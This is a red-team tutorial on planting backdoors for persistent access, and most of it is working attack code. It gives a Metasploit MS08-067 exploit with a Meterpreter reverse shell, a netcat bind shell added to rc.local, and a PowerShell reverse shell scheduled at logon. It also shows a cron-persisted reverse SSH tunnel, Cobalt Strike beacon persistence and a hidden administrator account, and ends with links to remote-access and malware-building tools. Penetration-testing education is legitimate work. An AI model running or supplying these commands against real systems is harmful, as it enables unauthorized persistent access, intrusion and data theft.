Backdoors

Practical Guide to Backdoors in Red Teaming

Backdoors are tools or methods used by attackers to maintain persistent access to a compromised system. In a red teaming context, backdoors allow penetration testers to ensure they can return to a system even if the initial access vector is closed. Below, we'll explore practical techniques for implementing and using backdoors.

Creating a Persistent Meterpreter Session

Tool: Metasploit

Steps:

• Exploit a vulnerability to gain an initial foothold.

• Migrate to a stable process to maintain the session.

• Set up persistence with a Meterpreter script.

use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
exploit

Once the session is established:

meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.1.101

This command sets up a persistent Meterpreter backdoor that will start every time the user logs in.

Using Netcat for a Simple Backdoor

Tool: Netcat

Steps:

• Transfer Netcat to the target system.

• Set up a persistent listener on the target system.

Example:

nc -lvp 4444 -e /bin/bash

To make it persistent, add the command to a startup script:

echo 'nc -lvp 4444 -e /bin/bash' >> /etc/rc.local

Using PowerShell for Windows Persistence

Tool: PowerShell

Steps:

• Create a PowerShell script to establish a reverse shell.

• Use Task Scheduler to run the script at startup.

Example:

$client = New-Object System.Net.Sockets.TCPClient("192.168.1.101", 4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2  = $sendback + "PS " + (pwd).Path + "> "
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte, 0, $sendbyte.Length)
    $stream.Flush()}
$client.Close()

Save this script and schedule it using Task Scheduler:

schtasks /create /sc onlogon /tn "PowerShell Backdoor" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\path\to\script.ps1"

Creating a Reverse SSH Tunnel

Tool: SSH

Steps:

• Set up a reverse SSH tunnel to maintain access.

Example:

ssh -R 9090:localhost:22 [email protected]

To make it persistent, add the command to cron:

(crontab -l ; echo "@reboot ssh -R 9090:localhost:22 [email protected]") | crontab -

Deploying Custom Backdoor with C2 Framework

Tool: Cobalt Strike

Steps:

• Use Cobalt Strike to create a custom beacon.

• Deploy the beacon on the target system and set it to call back periodically.

Example:

./teamserver <external IP> <password>
./agscript
> spawnb 192.168.1.100

In Cobalt Strike:

beacon> run persistence -script windows/beacon.exe -args 192.168.1.101 4444

Hidden User Accounts: Creating hidden user accounts with elevated privileges.

Example: Creating a Hidden Admin User on Windows:

net user hiddenadmin P@ssw0rd /add
net localgroup administrators hiddenadmin /add

Impact: The hidden user account provides the attacker with administrative access.

Some useful Backdoor references:

GitHub - screetsec/TheFatRat: Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV software protection .GitHub

GitHub - karma9874/AndroRAT: A Simple android remote administration tool using sockets. It uses java on the client side and python on the server sideGitHub

GitHub - n1nj4sec/pupy: Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in pythonGitHub